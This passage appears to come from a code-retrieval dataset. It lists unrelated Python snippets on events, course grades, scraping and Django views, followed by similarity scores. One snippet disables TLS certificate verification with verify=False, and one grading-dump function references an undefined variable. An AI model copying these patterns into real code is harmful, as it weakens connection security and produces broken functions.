information about the events\n event_ids = set(items)\n query = (Event.query\n .filter(Event.id.in_(event_ids))\n .options(subqueryload(Event.person_links).joinedload(EventPersonLink.person),\n joinedload(Event.own_room).noload('owner'),\n joinedload(Event.own_venue),\n joinedload(Event.category).undefer('effective_icon_data'),\n undefer('effective_protection_mode')))\n scheduled_events = defaultdict(list)\n ongoing_events = []\n events = []\n for e in query:\n if not includible(e):\n continue\n if grouped:\n local_start_dt = e.start_dt.astimezone(tz).date()\n local_end_dt = e.end_dt.astimezone(tz).date()\n if items[e.id] is None:\n # if there is no TimetableEntry, this means the event has not timetable on that interval\n for day in iterdays(max(start_dt.date(), local_start_dt), min(end_dt.date(), local_end_dt)):\n # if the event starts on this date, we've got a time slot\n if day.date() == local_start_dt:\n scheduled_events[day.date()].append((e.start_dt, e))\n else:\n ongoing_events.append(e)\n else:\n for start_d, start_dts in items[e.id].items():\n scheduled_events[start_d].append((start_dts[0], e))\n else:\n events.append(e)\n\n # result['events'][date(...)] -> [(datetime(....), Event(...))]\n # result[event_id]['contribs'][date(...)] -> [(TimetableEntry(...), Contribution(...))]\n # result['ongoing_events'] = [Event(...)]\n if grouped:\n result = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))\n else:\n result = defaultdict(lambda: defaultdict(list))\n\n result.update({\n 'events': scheduled_events if grouped else events,\n 'ongoing_events': ongoing_events\n })\n\n # according to detail level, ask for extra information from the DB\n if detail_level != 'event':\n query = _query_blocks(event_ids, dates_overlap, detail_level)\n if grouped:\n for b in query:\n start_date = b.timetable_entry.start_dt.astimezone(tz).date()\n result[b.session.event_id]['blocks'][start_date].append((b.timetable_entry, b))\n else:\n for b in query:\n result[b.session.event_id]['blocks'].append(b)\n\n if detail_level == 'contribution':\n query = (Contribution.query\n .filter(Contribution.event_id.in_(event_ids),\n dates_overlap(TimetableEntry),\n ~Contribution.is_deleted)\n .options(contains_eager(Contribution.timetable_entry),\n joinedload(Contribution.person_links))\n .join(TimetableEntry))\n if grouped:\n for c in query:\n start_date = c.timetable_entry.start_dt.astimezone(tz).date()\n result[c.event_id]['contribs'][start_date].append((c.timetable_entry, c))\n else:\n for c in query:\n result[c.event_id]['contributions'].append(c)\n\n query = (Break.query\n .filter(TimetableEntry.event_id.in_(event_ids), dates_overlap(TimetableEntry))\n .options(contains_eager(Break.timetable_entry))\n .join(TimetableEntry))\n if grouped:\n for b in query:\n start_date = b.timetable_entry.start_dt.astimezone(tz).date()\n result[b.timetable_entry.event_id]['breaks'][start_date].append((b.timetable_entry, b))\n else:\n for b in query:\n result[b.timetable_entry.event_id]['breaks'].append(b)\n return result", "def course_query(self, term, **kwargs):\n data = {\n 'course_number': kwargs.get('course_number', ''),\n 'subject': kwargs.get('subject', ''),\n 'instructor': kwargs.get('instructor', ''),\n 'course_start_eval': 'After', # todo verify vs 'at'\n 'course_start_time': kwargs.get('start', '-'), # todo parse arg into correct time\n 'course_end_eval': 'Before', # todo verify vs 'at'\n 'course_end_time': kwargs.get('end', '-'), # todo parse arg into correct time,\n 'course_level': kwargs.get('level', '-'),\n 
'course_units': kwargs.get('units', '-'),\n 'course_status': 'ALL',\n 'sortBy': '',\n 'showMe': '',\n 'runMe': '1',\n 'clearMe': '1',\n 'termCode': term.code,\n 'expandFilters': ''\n }\n try:\n r = self.post(self.COURSE_SEARCH_ENDPOINT, data=data)\n results = json.loads(r.text)['Results'] # {'COLUMNS': [...], 'DATA': [[col1_data, ...], ...}\n except KeyError:\n r = self.post(self.COURSE_SEARCH_ENDPOINT, data=data)\n results = json.loads(r.text)['Results']\n\n nrml_course_responses = self._normalize_course_query_response(results)\n\n courses = [self._course_from_query_response(term, resp) for resp in nrml_course_responses]\n return courses", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def dump_grading_context(course):\r\n msg = \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\" % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Listing grading context for course %s\\n\" % course.id\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsections, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsections)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n grade_format = getattr(sdesc, 'grade_format', None)\r\n aname = ''\r\n if grade_format in graders:\r\n gfmt = graders[grade_format]\r\n aname = '%s %02d' % (gfmt.short_label, gfmt.index)\r\n gfmt.index += 1\r\n elif sdesc.display_name in graders:\r\n gfmt = graders[sdesc.display_name]\r\n aname = '%s' % gfmt.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (grade_format=%s, Assignment=%s%s)\\n\" % (s.display_name, grade_format, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def categories(self):\r\n return self.q(css='span.rubric-category').text", "def amenities(self):\n G, mapping = self.network()\n waste = []\n resources = []\n intmed_products = []\n\n for nd in G:\n # if nd[0] != \"r\":\n if not isinstance(nd, int):\n if not G.in_edges(nd):\n resources.append(nd)\n elif not G.out_edges(nd):\n if nd != self.commodity:\n waste.append(nd)\n else:\n intmed_products.append(nd)\n\n return waste, resources, intmed_products", "def __ui_statistics_sort_avg(self, discipline_name):\n try:\n sorted_list = self.__grade_controller.get_averages_at_discipline_sorted_descending(discipline_name)\n if len(sorted_list) == 0:\n print(\"There is no student graded at the given discipline!\")\n return\n\n for student in sorted_list:\n print(str(student) + \"\\n\")\n\n except GradeException as ge:\n print(ge)\n return", "def getWismLogsByCategory():\n\tstats = {}\n\tfacDico = {}\n\ttry:\n\t\tfacDico = json.load(open(settings.FACILITIESDICO))\n\texcept:\n\t\tpass\n\n\t## 
Logs More important than informational (level 5 at least)\n\tlogs = WismEvent.objects.filter(severity__lte=5)\n\tcategories = set(logs.values_list('category', flat=True))\n\tfor cat in categories:\n\t\ttmp = logs.filter(category=cat).count()\n\t\t\n\t\tif cat in facDico:\n\t\t\tcat = facDico[cat]\n\n\t\tstats[cat] = tmp\n\n\treturn stats", "def get_category_list():\n return Category.objects.filter(active=True)", "def scrape_grades(self, cycle=0):\r\n cell_1_text = f\"{self.cell_name}{cycle}_c0\"\r\n cell_2_text = f\"{self.cell_name}{cycle}_c1\"\r\n cell_1 = self.web_driver.find_element_by_id(cell_1_text).text\r\n cell_2 = self.web_driver.find_element_by_id(cell_2_text).text\r\n\r\n if cell_1 == \"\":\r\n return \"\"\r\n\r\n class_name = \"\"\r\n for char in cell_1:\r\n if char == \" \" or len(class_name) > 9:\r\n break\r\n else:\r\n class_name += char\r\n\r\n grade = \"\"\r\n for char in cell_2:\r\n if char.isdigit() or char == \".\":\r\n grade += char\r\n\r\n grades = self.scrape_grades(cycle=cycle+1)\r\n new_grade = [class_name, grade]\r\n\r\n if grades == \"\":\r\n return [new_grade]\r\n\r\n self.write_log(f\"Class: {class_name} Grade: {grade}\")\r\n grades.append(new_grade)\r\n return grades", "def get_assignments_for_agenda(schedule):\n return SchedTimeSessAssignment.objects.filter(\n schedule__in=[schedule, schedule.base],\n session__on_agenda=True,\n )", "def getMeasures():", "def attribute_name_marge(self, attribute, category):\n for i in self.response_info['results']:\n if category != 'films':\n self.get_output[i['name']] = i[attribute]\n else:\n self.get_output[f\"title: {i['title']}\"] = i[attribute]\n self.counter += 1", "def what_is_the_grade(self):\n\t\treturn_dict = {\n\t\t\t'section_title': self.title, \n\t\t\t'section_weight': self.weight,\n\t\t\t'grade_value' : self.current_grade_value,\n\t\t\t'comment_text' : self.current_comment_text,\n\t\t\t'default_comments_text' : self.current_default_comment_text,\n\t\t\t'example_comments_text' : self.current_example_comment_text,\n\t\t\t'is_complete': self.is_complete\n\t\t}\n\n\t\treturn return_dict", "def all_problem_grade_distribution(request, course_id):\r\n json = {}\r\n\r\n # Only instructor for this particular course can request this information\r\n if has_instructor_access_for_class(request.user, course_id):\r\n try:\r\n json = dashboard_data.get_d3_problem_grade_distrib(course_id)\r\n except Exception as ex: # pylint: disable=broad-except\r\n log.error('Generating metrics failed with exception: %s', ex)\r\n json = {'error': \"error\"}\r\n else:\r\n json = {'error': \"Access Denied: User does not have access to this course's data\"}\r\n\r\n return HttpResponse(simplejson.dumps(json), mimetype=\"application/json\")", "def get_sample_acls(self, ctx, params):\n # ctx is the context object\n # return variables are: acls\n #BEGIN get_sample_acls\n id_ = _get_id_from_object(params, 'id', required=True)\n admin = _check_admin(\n self._user_lookup, ctx[_CTX_TOKEN], _AdminPermission.READ,\n # pretty annoying to test ctx.log_info is working, do it manually\n 'get_sample_acls', ctx.log_info, skip_check=not params.get('as_admin'))\n acls_ret = self._samples.get_sample_acls(id_, _UserID(ctx[_CTX_USER]), as_admin=admin)\n acls = _acls_to_dict(acls_ret)\n #END get_sample_acls\n\n # At some point might do deeper type checking...\n if not isinstance(acls, dict):\n raise ValueError('Method get_sample_acls return value ' +\n 'acls is not type dict as required.')\n # return the results\n return [acls]", "def detail_assignmentype(request, 
pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n assignments = assignmentype.assignment_set.\\\n annotate(std=StdDev('evalassignment__grade_assignment'),\n mean=Avg('evalassignment__grade_assignment'))\n if assignmentype:\n context['assignmentype'] = assignmentype\n context['assignments'] = assignments\n context['range_grades'] = range(assignmentype.nb_grading)\n return render(request, 'gradapp/detail_assignmentype.html',\n context)\n else:\n return redirect('gradapp:list_assignmentypes_running')", "def inspect_achievement(achievements, entity_type, entity, dirty_fields):\n\n # Getting only achievements that have sense to be checked\n achievements = achievements.filter(\n entity_type=entity_type,\n requirements__key__in=dirty_fields.keys()\n # NOTE: Excluding unlocked achievements\n ).exclude(\n id__in=entity.achievements.values_list('achievement_id', flat=True)\n ).distinct()\n\n # Inspecting\n for achievement in achievements:\n achievement.logic.inspect(entity)", "def print_output(filtered_courses_list):\n\n if not filtered_courses_list:\n print(\"No courses matched the query.\")\n return\n\n max_name_length = max([len(course.name) for course in filtered_courses_list])\n\n print(\" Sem | Course ID | Pts | \" +\n \" \" * ((max_name_length - 11) // 2 + (max_name_length - 1) % 2) + \"Course Name\" + \" \" * ((max_name_length - 11) // 2) +\n \" | Grade\")\n print(\"______|___________|_____|\" + \"_\" * (max_name_length + 2) + \"|______\")\n\n for course in filtered_courses_list:\n print(str(course.year) + course.semester, end=\" | \")\n print(course.cid, end=\" | \")\n print(course.creditpts, end=\" | \")\n print(course.name, end=\" \" * (max_name_length - len(course.name) + 1) + \"| \")\n\n print(course.grade)\n\n print(\"\\nGPA: \" + (\"%.3f\" % calculate_weighted_average(filtered_courses_list)))", "def show_events_in_category(self, category):\n event_names = []\n self._load_all_events()\n for name, events in self._events.items():\n if not events:\n continue\n if events[0].category == category:\n event_names.append(name)\n\n if not event_names:\n print(f\"There are no events in category {category}\")\n return\n\n for event_name in sorted(event_names):\n self.show_events(event_name)", "def exploreAisle(self):\n clear()\n print(print_banner(self.name))\n\n # Seperate the items into different dataframes for categories\n self.aisle_data, self.aisle_name, self.category_num = self.stock.showCategory(\"You see a sign point to different aisles\", \"Which aisle do you go down?\\n\", True)\n if self.aisle_name == 0:\n self.exit = False\n else:\n self.aisle_data = self.aisle_data[[\"Item\", \"Price\", \"Stock\"]]", "def show_event_categories(self):\n print(\"Catgories: {}\".format(\" \".join(self.list_unique_categories())))", "def _fetch_air_quality_routine(self, day):\n super()._fetch_air_quality_routine(day)\n\n res = requests.get( \n 'http://www.arpa.puglia.it/pentaho/ViewAction',\n params = [\n ('DATAINIZIO', day.strftime('%Y%d%m')),\n ('DATAFINE', day.strftime('%Y%d%m')),\n ('type', 'csv'),\n (':', day.strftime('%Y')),\n ('solution', 'ARPAPUGLIA'),\n ('action', 'meta-aria.xaction'),\n ('path', 'metacatalogo')\n ]\n )\n \n parsed_csv = list(csv.reader(res.text.split('\\n'), delimiter=';'))[9:]\n\n for province in self.provinces:\n province_data = [x for x in parsed_csv if len(x) > 2 and x[2] == province.name]\n \n for indicator, key in self.indicator_map.items():\n values = [self.extract_float(x[5]) for x in 
province_data \n if x[4] == key and self.extract_float(x[5]) is not None]\n \n if len(values) > 0:\n setattr(province.quality, indicator, round(mean(values), 2))\n \n if self.on_quality_fetched is not None: self.on_quality_fetched(self)", "def by_category(self, start_date, end_date, **kwargs):\n data = self.by_date(start_date, end_date)\n\n return data.values('category__name').annotate(count=models.Count('value')).order_by('category')", "def get_grades(session): \n res = _get_grades_step_0(session)\n dossier_path = re.search('href=\"([\\/a-zA-Z0-9\\.]*)\" title=\"Mon dossier\"', res).group(1)\n\n print(\"[STEP 0] got dossier path: \" + dossier_path)\n\n res = _get_grades_step_1(session, dossier_path)\n\n # Get the list of years available (1A, 2A, 3A) and their identifiers\n res = _get_grades_step_2(session)\n rgx = re.finditer(r'''<u>([A-Z\\/0-9]*)<\\/u><\\/a><\\/td><td width=\"30%\"><a href=\"#\" onclick=\"return oamSubmitForm\\('([a-zA-Z0-9_]*)','([a-zA-Z0-9_:]*)',null,\\[\\['row','([0-9]*)'\\]\\]\\);\" id=\"([a-zA-Z0-9_:]*)\">([a-zA-Z0-9 ]*)<\\/a>''', res)\n\n years = []\n for match in rgx:\n years.append({\n \"id\": match.group(1),\n \"name\": match.group(6),\n \"param\": match.group(2),\n \"paramval\": match.group(5),\n \"row\": match.group(4)\n })\n\n print(\"[STEP 2] got years:\", years)\n\n year_grades = []\n for year in years:\n res = _get_grades_step_3(session, year)\n\n soup = BeautifulSoup(res, 'html.parser')\n table = soup.find('table', attrs={'class':'portlet-table'})\n table_body = table.find('tbody')\n rows = table_body.find_all('tr')\n\n rawgrades = []\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n\n data = []\n for ele in cols:\n if ele:\n data.append(ele)\n\n rawgrades.append(data)\n\n grades = []\n gradergx = re.compile('^[0-9]{1,2}$')\n for line in rawgrades:\n if len(line) == 3 and gradergx.match(line[2]):\n grades.append({\n \"module_code\": line[0],\n \"module_name\": line[1],\n \"module_grade\": int(line[2])\n })\n\n print(\"[STEP 3] got {nb} modules with grades for year {year}\".format(\n nb=len(grades), year=year['name']))\n\n year_grades.append({\n 'year':{'id': year['id'], 'label': year['name']},\n 'grades': grades,\n 'raw': rawgrades\n })\n\n return year_grades", "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def get_topics(category):\n page = requests.get(BASE_URL, verify=False)\n soup = BeautifulSoup(page.content)\n output = []\n get_lesson_id = lambda url: url.split('=')[-1]\n\n if category == 'Top 10 Courses':\n playlist = soup.find(id='featured_playlists')\n for item in playlist.findAll('div', 'item'):\n link = item.find('a', 'featured-playlist-title')\n output.append({\n 'thumbnail': item.find('img').get('src'),\n 'title': link.text.replace('&nbsp;', '').strip(),\n 'lesson_id': get_lesson_id(link['href'])})\n else:\n sidebar = soup.find(id='main_aside')\n for dl in sidebar.findAll('dl'):\n if dl.find('h4').text == category:\n for item in dl.findAll('dd'):\n link = item.find('a', 'category-name')\n output.append({\n 'title': link.getText(' '),\n 'lesson_id': get_lesson_id(link['href'])})\n\n return output", "def get_possible_timeframes(level: str, section_type: str,\n student_obj, section_table) -> Set[int]:\n set_choices = dict()\n for st in SECTION_NAME_MAPPING.keys():\n section_id = student_obj.__getattribute__(f'{st}_info_id')\n if section_id: # section has been started\n set_choices[st] = int(section_table.row_dict[section_id].activity_timescale) // 30\n else:\n set_choices[st] = 
None\n\n if level == 'bronze':\n if 6 in set_choices.values(): # one section already on 6 months\n return {3} # only choice left is 3 months\n else:\n return {3, 6}\n\n elif level == 'silver':\n if section_type == 'vol':\n return {6}\n elif section_type == 'skill':\n if set_choices['phys'] == 3:\n return {6}\n elif set_choices['phys'] == 6:\n return {3}\n else:\n return {3, 6}\n elif section_type == 'phys':\n if set_choices['skill'] == 3:\n return {6}\n elif set_choices['skill'] == 6:\n return {3}\n else:\n return {3, 6}\n\n elif level == 'gold':\n if section_type == 'vol':\n return {12}\n elif section_type == 'skill':\n if set_choices['phys'] == 6:\n return {12}\n elif set_choices['phys'] == 12:\n return {6}\n else:\n return {6, 12}\n elif section_type == 'phys':\n if set_choices['skill'] == 6:\n return {12}\n elif set_choices['skill'] == 12:\n return {6}\n else:\n return {6, 12}", "def test_getCategoryValues(self):\r\n smpl_ids = ['PC.354', 'PC.355', 'PC.356', 'PC.481', 'PC.593', 'PC.607',\r\n 'PC.634', 'PC.635', 'PC.636']\r\n\r\n exp = [\r\n 'Control',\r\n 'Control',\r\n 'Control',\r\n 'Control',\r\n 'Control',\r\n 'Fast',\r\n 'Fast',\r\n 'Fast',\r\n 'Fast']\r\n obs = self.overview_map.getCategoryValues(smpl_ids, 'Treatment')\r\n self.assertEqual(obs, exp)", "def dump_grading_context(course):\r\n hbar = \"{}\\n\".format(\"-\" * 77)\r\n msg = hbar\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\"\\\r\n % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += hbar\r\n msg += \"Listing grading context for course %s\\n\" % course.id.to_deprecated_string()\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsomething, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsomething)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n frmat = getattr(sdesc, 'format', None)\r\n aname = ''\r\n if frmat in graders:\r\n gform = graders[frmat]\r\n aname = '%s %02d' % (gform.short_label, gform.index)\r\n gform.index += 1\r\n elif sdesc.display_name in graders:\r\n gform = graders[sdesc.display_name]\r\n aname = '%s' % gform.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (format=%s, Assignment=%s%s)\\n\"\\\r\n % (sdesc.display_name, frmat, aname, notes)\r\n msg += \"all descriptors:\\n\"\r\n msg += \"length=%d\\n\" % len(gcontext['all_descriptors'])\r\n msg = '<pre>%s</pre>' % msg.replace('<', '&lt;')\r\n return msg", "def list_spectrographs(self) -> None:\n for key, item in self.spectrographs.items():\n item.summary()\n print(\"\\n\")", "def make_recommendation_ga(playlist):\n tracklist = []\n\n # tracknames = list(playlist['name'])\n print(playlist.head())\n\n track_features = playlist[['danceability', 'energy']]\n # 'speechiness', 'acousticness',\n # 'instrumentalness', 'liveness', 'valence']]\n\n track_features_matrix = track_features.values\n\n path, fitness = ga.genetic_algorithm(track_features_matrix, plot=False)\n\n visualization.plot_path(\n track_features,\n path,\n fitness,\n mode=\"none\",\n keep=True\n 
)\n\n return tracklist", "def get_course(data):\n\n return {item['course'] for item in data}", "def ratings(self):\n session = Session.object_session(self)\n return session.query(Rating).join(Section).filter(Section.professor == self).all()" ]
[ "0.5233529", "0.5082282", "0.5039836", "0.49076796", "0.49012667", "0.4887644", "0.4880797", "0.48579165", "0.48460177", "0.4806707", "0.48065493", "0.47938785", "0.478363", "0.47725368", "0.47473636", "0.47454002", "0.47437078", "0.47360337", "0.47296265", "0.47234464", "0.47124693", "0.4704325", "0.4670285", "0.4658767", "0.46473724", "0.46345207", "0.46278307", "0.4606785", "0.4601236", "0.45969978", "0.45814225", "0.4550597", "0.45451537", "0.4543668", "0.45379758", "0.4535296", "0.45124856", "0.4507776", "0.4507384", "0.45023355", "0.4496329", "0.44873083", "0.44694552", "0.4466978", "0.4464146", "0.4456392", "0.44497317", "0.44431347", "0.44416052", "0.4440245", "0.44283047", "0.44207054", "0.44156593", "0.4414056", "0.44111884", "0.44047612", "0.44020358", "0.4394901", "0.43924618", "0.4389756", "0.43881667", "0.43838963", "0.43759596", "0.4368193", "0.43647772", "0.436457", "0.43604934", "0.43584722", "0.43584123", "0.43576622", "0.43562186", "0.43546453", "0.4353563", "0.4348825", "0.43429196", "0.43417495", "0.43388304", "0.43367106", "0.43347824", "0.43342176", "0.43321723", "0.43116432", "0.43106812", "0.43023401", "0.4295946", "0.42853454", "0.42852294", "0.4283868", "0.4282433", "0.42797568", "0.4279478", "0.42788708", "0.4278847", "0.42763335", "0.42757496", "0.42746866", "0.42721537", "0.42700535", "0.42652455", "0.4259139" ]
0.71396613
0
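A quick consistency note on the three trailing fields of the record above: the document's score (0.71396613) is higher than every entry in negative_scores (whose largest value is 0.5233529), which is consistent with a document_rank of 0 if the rank counts how many negatives outscore the document — an assumption about the schema, not something stated in the dump. The sketch below recomputes the rank under that assumption; it is illustrative only, presumes the row has already been parsed into a Python dict with the column names shown, and truncates the negative_scores list for brevity.

# Minimal sketch (not part of the dataset): recompute document_rank
# from document_score and negative_scores for one parsed row.
row = {
    "negative_scores": ["0.5233529", "0.5082282", "0.4259139"],  # truncated; full list above
    "document_score": "0.71396613",
    "document_rank": "0",
}
doc_score = float(row["document_score"])
neg_scores = [float(s) for s in row["negative_scores"]]
# Assumed rank definition: number of negatives scoring at least as high as the document.
recomputed_rank = sum(s >= doc_score for s in neg_scores)
assert recomputed_rank == int(row["document_rank"])  # 0: the document beats all negatives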
Show a list of timeslots to import grades from.
def copy(request, pk=None):
    """Show a list of timeslots to import grades from."""
    # do a copy
    if pk:
        ts = get_object_or_404(TimeSlot, pk=pk)
        if ts == get_timeslot():
            raise PermissionDenied("It is not possible to copy the grades from the current timeslot.")
        if get_timeslot().gradecategories.exists():
            return render(request, 'base.html', {
                'Message': "The current timeslot already has grade categories."
                           " Importing is not possible. "
                           "Please remove the categories in the current timeslot before copying.",
                'return': 'results:list_categories'})
        if request.method == 'POST':
            form = ConfirmForm(request.POST)
            if form.is_valid():
                for cat in ts.gradecategories.all():
                    old_id = cat.id
                    old_aspects = cat.aspects.all()
                    cat.id = None
                    cat.TimeSlot = get_timeslot()
                    cat.save()
                    for aspect in old_aspects:
                        aspect.id = None
                        aspect.Category = cat
                        aspect.save()
                return render(request, 'base.html', {'Message': 'Finished importing!', 'return': 'results:list_categories'})
        else:
            form = ConfirmForm()
        return render(request, 'GenericForm.html', {
            'form': form,
            'formtitle': 'Confirm copy grade categories and aspects',
            'buttontext': 'Confirm'
        })
    # list possible timeslots to copy from
    else:
        tss = TimeSlot.objects.filter(gradecategories__isnull=False).distinct()
        return render(request, "results/list_copy.html", {
            "tss": tss,
            'ts': get_timeslot(),
        })
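The view above is dispatched both with and without a pk, so it needs two routes. The URLconf below is a hypothetical sketch of that wiring, assuming Django's path() routing and the 'results' app namespace that the view itself references; the concrete route names and module layout are illustrative and not taken from this record.

# Hypothetical URLconf for the view above (illustrative; not from the source project).
from django.urls import path

from . import views  # assumed module containing copy()

app_name = 'results'
urlpatterns = [
    # No pk: render results/list_copy.html with the timeslots that can be copied from.
    path('copy/', views.copy, name='list_copy'),
    # With pk: show the ConfirmForm and, on a valid POST, copy that timeslot's categories.
    path('copy/<int:pk>/', views.copy, name='copy'),
]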
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_grades(state, from_dir):\n grading_manager = GradingManager(state.get_assignment(), from_dir)\n print_grades(grading_manager.grades(), state.user_name)", "def show_time(self):\n hour = str(datetime.datetime.now().strftime(\"%H\"))\n minute = str(datetime.datetime.now().strftime(\"%M\"))\n\n hour1 = int(hour[0])\n hour2 = int(hour[1])\n minute1 = int(minute[0])\n minute2 = int(minute[1])\n\n self.light_number(self.numbers[hour1], [0, 5])\n self.light_number(self.numbers[hour2], [0, 0])\n self.light_number(self.numbers[minute1], [5, 5])\n self.light_number(self.numbers[minute2], [5, 0])", "def show_runs(self,start=0,end=99999999,csv=False):\n if csv:\n print '{:>7}, {:>10}, {:>8}, {:>10}, {:3}, {:2}'.format('Run', \n 'Day', 'Time', 'Length', 'xtc', 'h5') \n \n else:\n print '='*72\n print 'Experiment {:}'.format(self.exp)\n print ' xtc dir {:}'.format(self.xtc_dir)\n print ' hdf5 dir {:}'.format(self.h5_dir)\n print '-'*72\n print '{:>7} {:>10} {:>8} {:>10} {:3} {:2}'.format('Run', 'Day', 'Time', \n 'Length', 'xtc', 'h5') \n print '-'*72\n \n for item in self.runs:\n run = item['num']\n if run >= start and run <= end:\n datestr = time.strftime('%Y-%m-%d',\n time.localtime(item['begin_time_unix']))\n timestr = time.strftime('%H:%M:%S',\n time.localtime(item['begin_time_unix']))\n if len(item['xtc_files']) > 0:\n xtc = 'xtc'\n else:\n xtc = ''\n \n if len(item['h5_files']) > 0:\n h5 = 'h5'\n else:\n h5 = ''\n \n begin_time = item['begin_time_unix']\n end_time = item['end_time_unix'] \n if end_time:\n dtime = end_time - begin_time\n flag = ' '\n else:\n dtime = time.time() - begin_time\n flag = '*'\n\n dmin = int(dtime/60)\n dsec = int(dtime % 60)\n if dmin > 0:\n dtstr = '{:4}m {:02}s'.format(dmin,dsec)\n else:\n dtstr = '{:02}s'.format(dsec)\n\n if csv:\n print '{:7}, {:10}, {:8}, {:>10}, {:3}, {:2}'.format(run,\n datestr, timestr, dtstr, xtc, h5)\n else:\n print '{:7} {:10} {:8} {:>10} {:3} {:2}'.format(run,\n datestr, timestr, dtstr, xtc, h5)\n\n if flag in '*':\n print '* Currently Acquiring Data for Run {:}'.format(run)", "def timesheet_all(request):\r\n return render(\r\n request,\r\n 'timesheet/timesheet_all.html'\r\n )", "def tests():\n dates, times = report_date_time()\n return render_template('tests.html',\n unit_date=dates[0], unit_time=times[0],\n integ_date=dates[1], integ_time=times[1])", "def timesheet(request):\r\n return render(\r\n request,\r\n 'timesheet/timesheet.html'\r\n )", "def display_imported_players(players_id_list):\r\n for player_id in players_id_list:\r\n print(players_table.get(doc_id=player_id))", "def print_time_statistics(times, func_names):\n headers = ['Name', 'Min', 'Mean', 'Median', 'Stdev', 'Max']\n rows = []\n for name, func_time in zip(func_names, times):\n rows.append(\n [name,\n min(func_time),\n statistics.mean(func_time),\n statistics.median(func_time),\n statistics.stdev(func_time) if len(func_time) > 1 else 0.0,\n max(func_time)])\n print(tabulate.tabulate(\n rows, headers=headers, floatfmt='.4f', tablefmt='github'))", "def printAll():\n data = load_yield_data()\n numberColumns = 5\n firstEntry = 'tmax5'\n lastEntry = 'lstmax9'\n colNames = list(data)\n firstIndex =colNames.index(firstEntry)\n lastIndex = colNames.index(lastEntry)\n numberTypesOfVariables = 5\n months = 5\n f, axarr = plt.subplots(numberTypesOfVariables, months)\n variables = ['tave5', 'tave6', 'tave7', 'tave8', 'tave9', 'vpdave5', 'vpdave6', 'vpdave7', 'vpdave8', 'vpdave9', 'precip5', 'precip6', 'precip7', 'precip8', 'precip9', 'evi5', 'evi6', 'evi7', 'evi8', 'evi9', 
'lstmax5', 'lstmax6', 'lstmax7', 'lstmax8', 'lstmax9']\n print(firstIndex, lastIndex)\n print(colNames)\n for i in range(len(variables)):\n axarr[int(i/numberColumns), int(i%numberColumns)].plot(data[variables[i]], data[\"yield_rainfed_ana\"],'bx')\n axarr[int(i/numberColumns), int(i%numberColumns)].set_title([variables[i]])\n Z = lowess(data['yield_rainfed_ana'], data[variables[i]],frac=0.3,it=3)\n axarr[int(i/numberColumns), int(i%numberColumns)].plot(Z[:,0], Z[:,1], 'g-', lw=5)\n plt.show()", "def list_lots(self):\n table = Table(\n 5,\n headers=['Short Name', 'Date', 'Cost', 'Gain', 'Gain%'],\n coltypes=['str', 'str', 'dollars', 'delta_dollars', 'percentage'])\n for account in self.accounts():\n for asset in account.assets():\n if hasattr(asset, 'list_lots'):\n lots = asset.list_lots()\n assert (\n lots.headers()\n == ['Date', 'Quantity', 'Cost', 'Gain', 'Gain%'])\n for lot in lots.list():\n table.add_row([asset.short_name()] + lot[:1] + lot[2:])\n return table", "def additional_times(request, dj_id):\n\n\tdj_id = int(dj_id)\n\tdj = BaseUser.objects.filter(id=dj_id).first()\n\n\tshow = Show.objects.filter(dj=dj).first()\n\n\t# This will be used to display the user's previous choices so that they won't resubmit the same\n\t# time slots\n\tif show:\n\t\tchoices = Choice.objects.filter(show=show)\n\telse:\n\t\tchoices = []\n\n\treturn render(request, 'additional_times.html', {\n\t\t'dj': dj,\n\t\t'choices': choices\n\t})", "def showLevels(self):\n\n pa = 'EUR_USD GBP_USD AUD_USD USD_CAD USD_CHF NZD_USD'.split(' ')\n gr = 'D H4 H1 M30 M15'.split(' ')\n for i in xrange(len(pa)):\n dfs = p.DataFrame()\n for j in xrange(len(gr)):\n try:\n training = self.viewTraining(pa[i], gr[j])\n df = training[0]\n manifest = training[1]\n dfs = dfs.combine_first(manifest.set_index('timeframe'))\n plot(df.get_values())\n except: \n ''\n try:\n dfs['timeframe'] = dfs.index # save the lost field before calling set_index()\n print dfs.set_index('forecast').sort(ascending=False)\n except: ''\n dfp = 